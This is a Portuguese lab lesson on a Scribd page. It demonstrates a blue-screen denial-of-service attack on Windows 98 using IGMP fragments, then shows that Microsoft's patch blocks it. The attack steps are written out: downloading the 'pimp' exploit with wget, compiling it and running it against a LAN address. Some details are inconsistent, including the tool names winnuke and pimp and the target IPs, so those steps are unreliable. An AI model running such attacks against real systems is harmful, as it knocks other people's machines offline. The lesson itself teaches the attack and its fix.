Scribd Logo
Fazer o upload

Bem-vindo(a) ao Scribd!

  • HS02

    Enviado por

    Fabio Aires
    18 visualizações7 páginas

    Direitos autorais

    © © All Rights Reserved

    Formatos disponíveis

    DOC, PDF, TXT ou leia online no Scribd

    Você considera este documento útil?

    Este conteúdo é inapropriado?

    Denunciar este documento

    Direitos autorais:

    © All Rights Reserved
    Baixe no formato DOC, PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    18 visualizações7 páginas

    HS02

    Enviado por

    Fabio Aires

    Direitos autorais:

    © All Rights Reserved
    Baixe no formato DOC, PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    de 7

    Aula 02 - Como os hackers

    conseguem derrubar a conexao de


    um Internauta com Windows 98
    INTRODUÇÃO
    Existe uma vulnerabilidade no projeto de desenvolvimento do “TCP/IP stack” do Microsoft® Windows® 98 que
    causa a perda da conexão TCP/IP das máquinas Windows 98 ao receberem um ataque de fragmentos de
    pacotes IGMP. Além de perder a conexão TCP/IP o Windows 98 apresenta a famosa tela azul da morte. Nesta
    aula usaremos a estacao17 Linux para demonstrar este ataque realizado através do exploit winnuke.

    PRÉ-REQUISITOS:
    Para compilar o exploit é necessário corrigir os links quebrados do pacote kernel-headers do Conectiva Linux
    7.0:

    ln –sf /usr/src/linux-2.4.5/include/linux/ /usr/include/linux

    ln –sf /usr/src/linux-2.4.5/include/asm /usr/include/asm

    Depois obtenha o exploit “pimp.c”:

    wget http://jeanchristian.com/exploits/pimp.zip
    E prossiga descompactando-o:

    unzip pimp.zip
    Protegendo o Windows 98 contra o ataque da tela azul da morte
    Professor JeanChristian.com

    Na sequência compile o exploit:

    gcc –o pimp pimp.c

    Supondo que o alvo do ataque seja uma estação Windows95 com IP 192.168.0.6, verifique se ela está visível
    na rede:

    ping 192.168.0.4 –c4


    Protegendo o Windows 98 contra o ataque da tela azul da morte
    Professor JeanChristian.com

    Depois, teste o ataque a partir da estação Linux:

    ./winnuke 192.168.0.4

    Após a execução do ataque a máquina alvo apresentará a “tela azul da morte”...


    Protegendo o Windows 98 contra o ataque da tela azul da morte
    Professor JeanChristian.com

    perdendo a conexão TCP/IP com a rede...

    exigindo que ela seja reiniciada para reestabelecer sua conexão TCP/IP:
    Protegendo o Windows 98 contra o ataque da tela azul da morte
    Professor JeanChristian.com

    PROTEGENDO O WINDOWS 98 CONTRA O ATAQUE DO PIMP


    Para proteger seu sistema Windows 98 deste ataque (pimp), você deve instalar o patch fornecido pela
    Microsoft “3304up98.exe”:

    http://ftp.skynet.be/pub/ftp.microsoft.com/service-packs/win98/critical/3304up98.EXE
    Execute o programa “3304up98.exe” e clique no botão SIM quando a caixa de diálogo avisar que o patch irá
    instalar a atualização de segurança do IGMP do Windows98:
    Protegendo o Windows 98 contra o ataque da tela azul da morte
    Professor JeanChristian.com

    Quando a instalação do patch for concluída, reinicie o Windows para que a atualização tenha efeito:

    Depois, tente realizar novo ataque contra a máquina que foi protegida:

    ./pimp 192.168.0.4
    Protegendo o Windows 98 contra o ataque da tela azul da morte
    Professor JeanChristian.com

    Observe na figura a seguir que o ataque não foi bem sucedido, pois, ainda é possível manter contato com a
    máquina alvo:

    ping 192.168.0.4 –c4

    Dessa forma, concluímos a demonstração da eficiência do patch 3304up98.exe para corrigir a vulnerabilidade
    do Windows 98 contra o ataque pimp.

    Você também pode gostar